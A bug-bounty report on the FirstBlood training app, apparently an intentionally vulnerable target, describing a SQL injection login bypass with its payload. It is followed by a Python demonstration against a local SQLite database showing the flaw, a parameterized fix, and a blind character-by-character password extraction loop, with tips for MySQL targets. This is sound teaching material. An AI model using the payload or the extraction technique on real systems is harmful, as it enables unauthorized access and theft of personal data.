FirstBlood-#686 SQL injection on /vaccination-manager/login.php
This issue was discovered on FirstBlood v2

On 2021-10-27, newrouge Level 3 reported:

Hey, I found that the vaccine-manager login portal is vulnerable to SQL injection. It bypasses authentication and leaks users' PII data.


  1. Go to /vaccination-manager/login.php
  2. Enter the username admin or Admin and the password anything' or 1=1 -- true .
  3. You are redirected to /portal.php


Along with vaccine portal access, this SQL injection can be used to dump all databases on the server. Using sqlmap I dumped a few tables.

Thank you



Endpoint: /vaccination-manager/login.php

Parameter: password

Payload: anypassword' or 1=1 -- true

FirstBlood ID: 30
Vulnerability Type: SQL Injection

There is an SQL injection on the vaccination management portal login page which results in the user being able to log in as the administrator.
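As an added example (not code from the report, from newrouge, or from FirstBlood), the script below reproduces both halves of the finding against an in-memory SQLite database: the assumed shape of the flawed login query in login.php, where the password is spliced into the SQL string; the same check with bound parameters, which treats the payload as nothing more than a wrong password; and a boolean-based blind extraction of the admin password through the login success/failure oracle, which is the technique sqlmap automates when it "dumps tables" through a login form. The table schema, the two sample users and their passwords are constructed for the demonstration; the only thing taken from the report is the payload.

```python
import sqlite3
import string

# Constructed sample data for this demonstration; not data from the report.
SAMPLE_USERS = [
    ("admin", "S3cretAdminPass!"),   # first row: the account the bypass lands on
    ("nurse1", "vaccine2021"),
]

# Payload from the report, typed into the password field with username "admin".
REPORT_PAYLOAD = "anypassword' or 1=1 -- true"


def make_db():
    """Build an in-memory SQLite database with an assumed users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, password) VALUES (?, ?)", SAMPLE_USERS
    )
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """Assumed shape of the flawed login: user input concatenated into the SQL.

    With the report payload the WHERE clause becomes
      username = 'admin' AND password = 'anypassword' or 1=1 -- true'
    so every row matches and the first one (admin) is returned.
    Returns the username of the first matching row, or None."""
    query = (
        "SELECT username FROM users WHERE username = '" + username
        + "' AND password = '" + password + "'"
    )
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def login_fixed(conn, username, password):
    """Same check with bound parameters: the payload is just a wrong password."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


def extract_via_blind(conn, scalar_sql, login=login_vulnerable, max_len=64):
    """Boolean-based blind extraction of one string through the login oracle.

    scalar_sql is a subquery yielding one string, e.g. the admin password.
    Each guess injects a password making the WHERE clause
      (username='admin' AND password='') OR substr(<scalar>, i, 1) = '<c>'
    A successful login means the guessed character at position i is right;
    when no candidate matches, the end of the string has been reached."""
    alphabet = string.ascii_letters + string.digits + "!@#$%^&*_-"
    recovered = ""
    for pos in range(1, max_len + 1):
        for ch in alphabet:
            payload = f"' or substr({scalar_sql}, {pos}, 1) = '{ch}' -- "
            if login(conn, "admin", payload) is not None:
                recovered += ch
                break
        else:
            break  # no candidate matched: end of string (or char outside alphabet)
    return recovered


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", login_vulnerable(db, "admin", REPORT_PAYLOAD))  # admin
    print("fixed:     ", login_fixed(db, "admin", REPORT_PAYLOAD))       # None
    admin_pw = "(select password from users where username='admin')"
    print("blind dump:", extract_via_blind(db, admin_pw))  # S3cretAdminPass!
```

Two caveats when carrying this over to the real target. The bypass lands on whichever row the database returns first, which in this report happened to be the administrator; on another schema it could be a low-privilege user, so "logged in as someone" and "logged in as admin" are different findings. The blind loop relies on `=` being case-sensitive, which holds in SQLite but not under MySQL's default case-insensitive collations, where `substr(...) = 's'` also matches `S`; there you compare `ascii(substr(...))` or use `BINARY`, which sqlmap does for you. Note also that in MySQL the `--` comment needs a following space, which the report's `-- true` supplies.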